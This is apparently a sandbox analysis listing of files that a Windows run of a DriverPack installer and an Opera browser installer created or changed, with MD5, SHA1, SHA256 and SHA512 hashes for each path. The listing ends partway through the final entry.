SHA1 3f5e3933c88afa7e8e205439dbe5518ad90829bc
SHA256 77526c7ffb2403031787da2d8947d9018f45492d589f298c017eacc60d3220ee
SHA512 e0070a4d6db7ad1a558d4c1b82584c7f3e78852ac23c3f8e6448e8d204089b2eab33f7059a04c7c4c1ff0beb047bb32b1f042407f7933a44dbcc5a31d9d7d6e3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms~RFf7949ec.TMP

MD5 1a1c63d07f0c86b51918a797341761f5
SHA1 f25f33f6bdb0d22ac6e92090821990cf5299b968
SHA256 8111522ffe9f854441901f7f4bf5481840e672bde7098eb8ed5cccb82620ebd5
SHA512 286f2ee557a075c83bcab1cde768fd2481f5c06940e2642343f7b308f0bc0f25b553dacdc0b429af50a1f782f209e016227fef1dd77879cb34b95163a3cb5b52

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 f5353e5b338228a79efeaeff5cb66230
SHA1 2e5362d3efb9e8d96333e64282e4824f3b3d2936
SHA256 bd21962b2b609738d5a60a203398843961e1b158ff88887fcca6c7d277f01b52
SHA512 a525bbc84d97ca916d879fb9b5cff1bac2a99805fab20460d8bee33434b7d088a3b8d2456ddf43411d643209f673b5eb3e30ace50065d5ce08a26690d40247e5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 6af84e1b46e70dea667c9342c8aceeb0
SHA1 053b1110deb69821347f2fc9f0fc8889216ae7b3
SHA256 dece7de41f306d4ebd16ab8b173666da8cfd2449667f70cc57a8bccf5f927599
SHA512 f71c03e358a3aa549003bc085be368d49d7f298562f47c7a7afd52b8e6af8d2affede1e8944765bf92c2687d62798ef7e0af26d4fea28fce785172ff91819ab6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 deb4b4b676412e407d75b1b782fd0db3
SHA1 ac5d823dfb6112f1fc8af54313df0c819f4065fd
SHA256 33cda462025c7688049e400e283d83543b3a991ffc5450f05ebdd44ba215334b
SHA512 836bf7164ac2c8d28692c022bdbf7655bc848efa9e2faa153d35bfc7b1f2150bd76347e15524be9bd5e9792d308f77a45c3491dc7b8815f84ec521c1612ea260

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 ec0a801a802d92a9af2301fc0f94f118
SHA1 ab9996e1b0246bffea1a4a1a592239b249b83beb
SHA256 c62102cd232688bf878f78270346e2a282ff17ad76374f70bb32e92eadd777b3
SHA512 a924835d298f4160e93ae34b6f50d24497387826e7943961d4dae46aaa92fb7e88c84dbe61b2fd8fcf458cac1bf9d7506929890af038b89bea6a8500cadd5b00

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 4b0854b452acd635a82f1af7dd1faaeb
SHA1 e2501888a99996abaca7f68d1b348bec7b110349
SHA256 db613dc3a7a29e5c1ef19b423c179bc931f2ebbf7a44019dc5b24523be97e55d
SHA512 c3aab880acc7ab3137e3803ff1aef1816bcb8d3228a27269e9ff61012ed2d8bacc7470ea72b914980988f68553a2fa7560914ee2ad36951eb4cb1daed14fe38c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 8e76da421602ca220e94290e8fd31596
SHA1 6b63efafe921d8d0df8f54263c87b9343491819d
SHA256 9c1a805b3a30b31a4b58cb0342b92e331d7d04d9cab09a372d9bb5e1ab8d4304
SHA512 c426bbb36b53f3ed2f7ed5046c26aa6a5531fcb7ce61d30e989fdbbd54562c423ef1c0ef81682a15a10fa3183777774fbb7a6861fb84b28235aacf1b92351c64

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 8e78e7eebda10cb51fa7c537d11608bd
SHA1 b1e2d6d070ad4ec4f95da5670100e2c91b6b0312
SHA256 bdc1bf1e7b42f88e5894e2caa02cd6a71f985348826a2407fd691f14ad576520
SHA512 14d45a75cde02495acf906359db6a5ac3ed803d7a1ae97448461a69553762c61fe33312481cd865def7311a4b234f626334d7dcb4c44831454252fd4c835c2d8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8cb6833f72c3295306af331ede848816
SHA1 c11904efca450170872ce2bf9df809e4dea1d70c
SHA256 073471a8227ce8ec3ec680689f913ee9698b335081a33e3de0a58191c339f816
SHA512 7f8061734b9108fe80cac3f2404e6ec3e3f6b39536873ea999b25cc736c5a353596a8d15007d623fefc7dcfed6f0eb46f51313c9018f7cfd465560d37e326df9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 7af8bea526c57c8f0ebef7f26bd4abc3
SHA1 8a46a46fe08c5f54a6c56c018a7498d1f5824122
SHA256 6aa37ffea5d1fbaa39d84a0ce58f71555a3e9941a8c3d893d8d3810307996ff4
SHA512 07c44134331388469c2007cd771fcd05732ed024cfb25d1c533b4061e9ae366bc56ab8372eeee2a0a36472e3eee72a87a807cdfca440fe14c60cf7e2358794d6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 4aced732f48d7bc32f2c04e4b150efde
SHA1 258bb328d3cbb1824e79759348954cec9674d925
SHA256 012f95fd7d2e60997a2e1ffa3dcc6823d566615393d62b618e275fee0010ac53
SHA512 ccc70807cbbca8e970ae506cf33731d4c31758c0e73991006023ff18e509c7f0da86981780a1f7bbf49de18b0c0379da8cd6710213963c45637a7d493e1847a7

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 df02c9ab1a36b4ab7d576e26b4545e91
SHA1 2b27f11c514c6ed51c51f9734605f6203f549ba4
SHA256 91dd946d3b57536273f282621c10f72916444f6820ada51dd54c5a0e89e66a3a
SHA512 5ab9f66500764c5352ba57669d805445428a8ab42ede9fe9878a819fed78cbdc814aa4ee4707f7138975796a1b402ffe05cddffc990426bbe6acb75120601152

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 142835a1adb051e6da54db7f27a11607
SHA1 0f64de6771c66c93a6bfea4dd0a664ca6f4a67f2
SHA256 dc4bb763f6ff3ecb528f03994e3e2854e25c4babbbde39217bc583f16c026c88
SHA512 f26fd2ee7b2563e277cef67f9d45443a47455e08231a3079fc9c3a83eae438d02a00c88b2182a6bdadcef78d543b783b95b5adb10961b546a2f076d8dc1f5694

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 625b711a38b36d69e491c0b36670be90
SHA1 bd635b985f16b45c535f388b3c42bf8d8576aa66
SHA256 f065c377a8fd1e233df48b4259bd094ed6f65e4e915a768ac79d7ac9b75a1c62
SHA512 777f07257db79e425766d3d3828f1208286c9ba36611fec7ce4e89c0f3e7563540b1882b336358c85107898eead0f52cbbf9be7ac4cfa2f8e78af315e32b6fa9

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-false-positive-6.mp3

MD5 c901b46b901513980fba4fbd366b280a
SHA1 5c148b1be5bdd11c6a1cd68a17ce7e8053a5f025
SHA256 6357f0ab79646880bbdf8eb44b48413e3fb2ad8169d9a085d5b8337067c64a85
SHA512 6ea4f76f182914d9f5a3e452a3cb2e8f0b07d0ef57073ae215b80a2839dfd8df7e001c380014d7090a57f0850949bc95e82b630c6a1664aa5a4375fc5074f139

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a252882e2c380ce52df893f559cdf2e9
SHA1 5bd3748e0a2032b9dcc9f4c74bdea17b8742ab38
SHA256 4140096aa9bdc3928b72d66c7535fa4094065889c19bac654f7dc67c7fe09a0d
SHA512 c308bff54a457a2fb47e1a272e3dcd08c7b5ef92792aa89cca8404bb64aa540fc2f60be30c7b41af0bf400fd96e21ff6d145cbc3f39380680ca53401fe56456a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7b6cadfdf91002c36edc0b512f3c6103
SHA1 3cb523cdc5e9c697403fde2cc990d3177ed9e203
SHA256 930c7f013d64e2daeb544f7f3e4989729bd24238049fe1c98ed0b8bb4c1ad6e0
SHA512 256e8bd317c55d18cd62386028ef23ffdd3dc166e37428fe3d0542e0aea21a50eef1248d58344545fe537018374c2b3e748f4f45c77290ea9004c841606ba90d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 b1a7cf9ffd4d084d5b5740c4fd1563bc
SHA1 78dbdb518ea36ef94f39cc45f666800c4ac4c371
SHA256 247911f4598c8ef186e047e3dc2046a76baf3ff38f37e9f9fc1f7554c4d205b6
SHA512 0bdf77f602b1554fe64ba1e5b48b939af5172ba00f4b5faba80afef46078c1c5258ed5fd6d036d192d8b87a42fc052b5310d1f6cb7440032f42233ebdc5c1705

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 6bcb709d58c6a448a6c77b55c2e952a5
SHA1 670a9ff0bb06efd55914af28611dc9e3b53e2c8f
SHA256 c53fe98b64768ec5e3811ebe5310fcc225777ef435a72af41839e3fdac5e944a
SHA512 a18d0fc880d7fd734bfc4f9462074c6964200f586c1437cf64649dec4aaf046e949b5f853725546b1c230059489c81b31bea58ebc5380b387513b0983cd62fa9

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\STORIES-false-positive-8[1].mp3

MD5 7b6a666c5d97d1bf7f3c64be3df022de
SHA1 c35ac7f97c810e304adf8b2f5b9256747ed69130
SHA256 9afbfdd9851b96d06f12b64fa63088a8f8badd558ca678b0adf3ac6cf39ac809
SHA512 93cd444945ad53dc27172f64287d30700948b9a6e3c723c56ff671afc754fc138360a7bf799b0f4a19332d681d13313bc8be4f6c090aac986062aef38d41be7d

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks

MD5 3cdae1ab19f7c3c8fb13cdc59c2141cc
SHA1 28178e20e15fa733a5ad7a69d1f675107dc48edb
SHA256 228e0184a85b71554c9ff869a50bb3d7c4b732f5c354f350f4c52d94f65253d1
SHA512 72cedb2bb04e2c06b0da80dbb470a4ff1d1ee62c1e5fdbf600f9bbf6980f839ab450510301a58af0e5185abf25311d067eb2fe3d8870ee99dbef809459d6a189

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 db84269087fea65c76bc008f0e12a1e7
SHA1 15e863f62727b57ccbb9d0d2164bc5b8582cf44c
SHA256 daa6cdb2889260e0ee08a8d7af5bf1cbf722b2ef3c3ff36ce2a2a27075b8559d
SHA512 67c683d2c9b953ea1d729ef12f39457f3fee39d1bcd1606722cf18db4572c710864c420e4e33b6edf349a6aa157179923879ed33fd9e73f2ac9350b589a10d8d

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-drivers-1.mp3

MD5 344dafa39279e85ced84cbf3e306e40e
SHA1 c47979dc071b27ac66d0e3185b888a3918256b5c
SHA256 27101c7877d811bbdf91ebb4ad3f3417c931695e25c42b8d16e2c11ae7d10007
SHA512 3fdf84ccebb30ff18c7c3f40e1d33c1b09723f954ec66e82829f7f4c0722e91ba52d7250c219bf0f730da38d95580b36e4835565d1c8f1591ff3d701905f081f

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-drivers-2.mp3

MD5 df38064b1fcc6e331c208e0d895c58f1
SHA1 50bd40436b540e420d80517ccf40b7fee0db3ca0
SHA256 9340428a6cd03ba6c10bb2d332e145916e58698a317dd57cf5512d75fc36e74f
SHA512 bbef6db240c2957571c0115529bcc074d5c27d738ab86e2f81aa44f9eeb174d310a87c806a4ddf29767c043bd10a81b4d8464ee282737677d9ec404e46a3b687

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\STORIES-drivers-5[1].mp3

MD5 3f987b9faa554bae08600b846223a724
SHA1 515afb327273cfa60d3ab56b6446936d4633fe20
SHA256 0c3b794f94c56c9e376b2c5e95026c1b32e53fbb0047364c6f1fe0679f35a928
SHA512 c689bbda8dc7041c07694d02369f2f1a11fc9a43b8851fd312ca20186a46c6dd31f989f4432a4d1e318ee2d67fbf247f2306d67c0d85edc9c160c148eb6a80d1

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\STORIES-drivers-3[1].mp3

MD5 575df7e50c2835560cbb14d8682f65dd
SHA1 1207d4b288406d146417059fcd89cdd6b0478326
SHA256 9b63949f65789569072620e36d957c7839ad229f87b983c6ec19e1502e2a794f
SHA512 07393db592df7c828402178bf665baeeb7227ef3f915f29666e1e1faa74f7bc1aa2531bfb886a494541f94e2b10f9ebc160ba92018e69c95acfd53efaecca933

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JB8Q1DZR\STORIES-drivers-6[1].mp3

MD5 0d54208b96b385c5c866ddf066add843
SHA1 f3e97335fe86524ca578e21b8afa8552b6d0427a
SHA256 1106ae9b5ecb4aacaeb3af3d8a9949a4837740bdf13a45f39fcb50e0574fc75f
SHA512 fa9c7b5f44986e5ab90dc211ca77404e9aae2fb6a47c7d60af31e21bd5eb4cee77b0c99f302d62bb151a142d27b1acf262fbba94d183f6ae43a8c43c50833e45

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 12ca2e58b7c93c4c3a2c9776899b9d72
SHA1 3517dd6c15e52d1a08d8cd592a49718b79d370b4
SHA256 3ef21096643584dfe59a7a4e4e53451064f9ced7611b2108060aaba2121f210a
SHA512 9d5476d60bdfad887ce0b4630227c761c988ecf1183975b4f1cbbf9171e24ae248466b3124b6ad92d17dfcd33b4778b0995e8b917d70dfe97b848d74ac5dfa3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1436f65fbb15ac92.customDestinations-ms

MD5 9f537590fe3b8984622749e673c4bc39
SHA1 7f757a303e306569df4c88dc7c2112ca0898d75a
SHA256 c35f1d9cc82f3bf1f11e14454335a8c543206b91b2e79f26ff96e1035cedafcd
SHA512 43979c2d25cda737234ab7b0d3cafe4ced0dff8e827ac1d8ff4d7b945afdc5d510a0dd972438be3fd3332c51be94240f90aebebe340f87416325b6e54aced675

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\STORIES-vpn-3[1].mp3

MD5 2d7367ef65a5e9bcb8e0d841b089d509
SHA1 9350d03a3ba32b8c1e2c469c5da746be009d92b8
SHA256 b26424b6f406b132ca1b15046958cf65487f6e4d72ad002f142e8fccd2450e93
SHA512 0450c0eee32a7b58e14c8679e581d4eb400b7cef78a5ddf48740ee653c167c3f12b6093c29aca36a59038f6c3aa1c405599ac17bd9764d4ff74ce3587648d18f

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-vpn-5.mp3

MD5 c51f1be71c90d672529714aac7912907
SHA1 1e55cf5d2ac1f9151b1e878870b3bd6c6aa2213b
SHA256 a0984b9cae1dcb777b8d6f9e43644f9bb4d71dbf32c6fff51d56c083436c00a6
SHA512 819a11f4e6443798c4b512c1b4b4372e7fff03535b005c21d559c414bfb7077d75d386fd2ca2f994d2f2520488144a4090292980c014f520000f51233e776ff0

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local State

MD5 49619db558a8f3f19c336629f1228bf5
SHA1 7f54a77b6667d1d22c4d15896f278839b9ee2b00
SHA256 4ebcd039580ff223a886e3f2adf746b4ab9259b8d268390160fb90dbe9e9d527
SHA512 d11f51ca604dc8e350567d9f3eccc16711e1cc8e974ed86339843808b76e6f839acad8e9c68fd93e398e21a1be20d7f6564c99c29b633f428cb661ad28092060

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Preferences

MD5 d1b7431202cb4657fba5a362647ca640
SHA1 ee57030f609219bc80f2ff0335177f7f35c6f66e
SHA256 8eefa62dfa537844cb777e11fab1435b0c770efe5b383e2002447db62118b101
SHA512 272e643da55d10ee4ec7089c545ec20c64eb4ac6a9c4b65442defb745fe68b7d0454f560eeb6dadf4296a9b22516f6a459739780d0f9ff2ccb7cc1b26d02f2c1

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp2544.6.494776672

MD5 ba8bc5b477c462985a4d649dde86b1d9
SHA1 e34c265376a3d15b84a09a5396a1873babcdd4d2
SHA256 b9763d7ad90f9c22a418c093d44c32ae323d12fea1a3fb2db5ef5c14aab7896a
SHA512 d4f479b51647fffb1bb6530c818640085d7e3216eb7ebfdec434be89d57a4b3b708a7c346f8d99e71444f343a719083222e6d3cb7ed1352f77da4896a482dd98

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\TransportSecurity

MD5 50aa985494c31961c74e282d25748d42
SHA1 a38df9ddb3c476957a33aae690af33111aeeabf5
SHA256 ee3d7ae41a1777e232345cb13860eb0d485b19e5c9ec7b6ecd0c51b38d3dbd90
SHA512 7202b2a19b5aace6222810453217e68e8f641444fb4a24113b09044ae3d07172c4d26062d5aac2815e21cb44c04acd1129ced0e0790fa4d7bcd42308d681f7ed

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\BookmarksExtras

MD5 596e258c62a2c47b4f0829c7fd7c4dc6
SHA1 bb5f31fe8e948eedc065f8edce90c8715ac3dc86
SHA256 b69841adc28892b3850af3e5016119e9606f78c4f965d09aa513f7320e5f485d
SHA512 5e6957bd65d3b62c8ca7494146843218ffe65451261355de937d3a0990d0149045d1b358bcf46bbc8692a77a77481419469ef55d4e901072604fd2f3c81164ee

C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_31413.txt

MD5 47a22a7a342fd09177c62fcb8054933c
SHA1 d2b7928a34eedb04acc61c3a0e01d3138295e855
SHA256 51e6af14fa1e9032300dbf76a85cb8561e523e89c363cec09cdc2128801a191d
SHA512 b9ab174618fe617b061e27c8f0d4b7960271952a67245c2ad6155e93e0c08cab696191fbc7069c89f05ff545318f930cbd0dd7dc41b9cca0e7356143d3b47d98

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2405031652011864168.dll

MD5 720899387332739b47eeae016f6d5f3e
SHA1 7b4c960c5ce93e5466d577d88b2fb17d54b1be18
SHA256 827c8a41c26fdeef0c42bb3c8f710aafd6b7b8a780d4c4701335a5ffa6905c2e
SHA512 b1eeeac433295dcf93fee856da8e80bbd8d27c286503ec05ea186b2a294a4280f66184b2d8af5f121dddd1f66af648de06f871ebe66d8ebadce6aa644dcdfe46

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6d31badcb71261186e5f3d2139d43ce0
SHA1 3aab5d61f7e844b3c1c1d70243a04ae49ce9c1a6
SHA256 a7ccde8902767c21b12296c772abaf53d54516789361f828d615829d39ab443e
SHA512 063eb136526803e420ca90f8111bea2132cb817b83032b40347049ca32e181ad791f755212857d5ea7ba736ea42c3326f15ed68c4c79fd08dc5b4b8d7042d318

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0e5a1e2f95167e2e1611588fc1f881ca
SHA1 a1c79a3a12f6381fef8064ad7422f60c508aa9ea
SHA256 588935c0e61d722ac33fd964c4108ae1e0033e9563ea5dc801b9a9d0dc23ac7e
SHA512 1678502c47bf5573b9c8018f07f555ac9e70a12b65cef21b0deb9ce80a79b1729a11f8b12b2ac83fb5924456eb921646bfa471a88d6bb4460d66232cf462bb5d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9c978bd3ac7546448e34ac301a540ec5
SHA1 145c1d1e9c74ebaf92465bdda95e151063f42b5c
SHA256 470b734aec7bc86af31e7fd561591718c5250adcb62274f1442346b2e6c114a0
SHA512 18d2c41a332ef494dfdb6d042319c010cdf68e447dde0088ada11ff7aa97e29ae1d84b67d1e6f64974b8f669101bc7e83913f391fea18de163d4eab1d8ebf0a5

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 dc930f35151ed5ac15511d6494f7ef21
SHA1 da59e4ebf9fdbbbee8a488f6eb23e86a73a8306d
SHA256 1256642626a5c1fcbed9d4c8982d04b0cd889b06cf6f8bcce5bd8ecb6edf15e3
SHA512 113cf3ab36f5f5264d431601c9bb2b742b9b2f96417b7f2d16c9d94b1a1b1dc4e71706b59e7b6bf8c3c5222aeb8b1ad0a29e5d20adef8a196d634469b011de9c

C:\Program Files (x86)\Opera\installer_prefs.json.backup

MD5 4ae8433b1e85892acf9dfec476d394d4
SHA1 74a71a5f89525197a1da4eee5742addc30e3720b
SHA256 6066044700cd5fac5de0c91ed8e4f972cbf349a49117d9b5b6971f68b828cef0
SHA512 70bc3378764847d22bb6add5e49db33fa9480f7f0e6edea04c67bf8f2e9a09f95dd9457dbe145c8e7615ceb0117ebda107505d0cdd6f80ae7f386ade958cb87d

C:\Users\Admin\AppData\Local\Temp\Opera Installer Temp\opera_package_202405031652011\Opera Browser.lnk

MD5 897c518f43a2578691af7f7bd800fc73
SHA1 376a128b915c32415f19854871a76931ee5a94c5
SHA256 fcef2933cefd7f5b0cff7ecf3b1aa13af00836be7362e5f5db8b5ed34d185008
SHA512 5489e15a97609081a1055bd68c0d674c9a5d989ff6510ea04824f90b42fbb08e076e152ec9e5b7c8c29eeafd64e4d5edb81b1e1b9dbe4f7e74c5d8b191b03ce2

C:\Program Files (x86)\Opera\installer_prefs.json

MD5 2e364aef9cdb56eec97b3b689c83f3c0
SHA1 a8d318fb21f2c56a7ff9314f2a68d4f95e732c60
SHA256 8933a1a5bd19d89068e8351ee788431eda942dfa77159de6a1d458596cbafd14
SHA512 8e50f33a0de111d96bd9f1c4304b805607f519d57b968e3c12bd23477d71c80bf9fce31a058167e0612fdfa5041569db17eb57abc60b5ab8dd10cc29dfc1ffb3

C:\Program Files (x86)\Opera\launcher.exe

MD5 7fb2a3677d7694b9e767a71de36ea0bd
SHA1 8b705e06db85d2b594027f359459577f0ad1bf54
SHA256 acf74db1e8cf526953f460b6fe17feb1d9230ded1c52d4c8402416c60fd8d071
SHA512 04422e6d73001e56eef27ebe0c9b96ecd2ce090df3d9053b24fb7227ed914174476099ba52600d3f106eae96ec820ab1a6ea63cde0dbe209cfa7399f646a0b5f

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local State

MD5 25116974f89bcc747864dddeb3d873a5
SHA1 9f4d831e9554142db972d3032d530df391185aba
SHA256 1ded79d0bba635dfbcf295f3f2b6fb36378127e390efb0e4097028100692a52a
SHA512 1b549b390089b1b5bcaf1207baa2a3b27605d502d6a2b33eaab9b88bfe723407d32e97c132d7dff60c763c71617208f9ba1ce899ae3853cfcc9e19a8ec20298a

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Site Characteristics Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Site Characteristics Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\scoped_dir3212_1534466480\reborn3.svg

MD5 44b901d70ae39fb5409847b607745d2e
SHA1 3c97371179bc00cf61e8c7c13160ba887e4c85ff
SHA256 6186ca543997a052ab551a4a7893fc5b9691d5609d5c176864578a6d54e5f3e7
SHA512 d0cace25b3b60ea17b1a606dcd843f3d863ff1ac264975db8496e33e87d735808b194772fc37c0568f27787c1eb10b577814376915024e2350020cf6a1bbb8c9

C:\Users\Admin\AppData\Local\Temp\scoped_dir3212_1534466480\persona.ini

MD5 dd72770c4ba4e80b381233af11d384b4
SHA1 86f2853288c2a001f04a73f6a356b961aebae377
SHA256 92f960e6b49f8e0b3a5e36934219f7240103f1a739dda8a8a4334a4ab1aa379c
SHA512 243091a8f1256ff83a88ee3467c91aa23ef8e6da8dcb431531c68cb86b812c8a1207a4a2f4f5fffc473576c766df74d78f49c7acafb877ff2610c27c0c236d9a

C:\Users\Admin\AppData\Local\Temp\scoped_dir3212_1957398267\reborn3_dark.svg

MD5 7f987ad643a6de6706c2db4bc55df032
SHA1 a80f715825dff840b0be58edfe2fcd03f65bf3a4
SHA256 550977a2c62ddeee7fa8c18c59ab7cdec1e5d8cb37b5a1c145afaa5c9f94ba7d
SHA512 0f3aae2735f3c51c7560c2b315adda29932fd541b6e33bec2daa890d2f1af52590419656d31e94fff40a847216c797ddbb724d6bf865598aa1277481e47a94dd

C:\Users\Admin\AppData\Local\Temp\scoped_dir3212_1957398267\persona.ini

MD5 6f7906203edfa17f9d8cd7a32da0bb02
SHA1 1eb97213c5d6e8ed4a4d0928a1d6b4ea601bd40e
SHA256 556ff37ec6c9e12040fee10b585372a908796520f706c967acecd09d363612b7
SHA512 b16449584b265337adbdff5ee32f13dee155fbaeb1ff12584b59265d546da346e18d600a6839a830796e02d88bf819e954b7ff76bfab9c333ea8294b28f089e1

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Preferences

MD5 59a79960963fc42f6e7840e336206159
SHA1 49dbd453092e427793d7b5f9b54d9d683e15ffc7
SHA256 9e3edc7c9db85eb459a53664a4ff43466bd6255e4224c97ec6465dbb82f349eb
SHA512 f5a0a9455e9d2d544b650a5187873ea0e7479a1e0426b7bdb154410d19005612ecd74c27d99bbd0f7f102c85f5644449965081336560cf69103f6e029228d42e

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ad67b5dfa4284a94567710d56e24946c
SHA1 1b7074732d54708719ef70072f1d7e1e8dda0f42
SHA256 580510698331d5df5e8489f05037829ac15a8bf981dd0779a16e9b9eb3722329
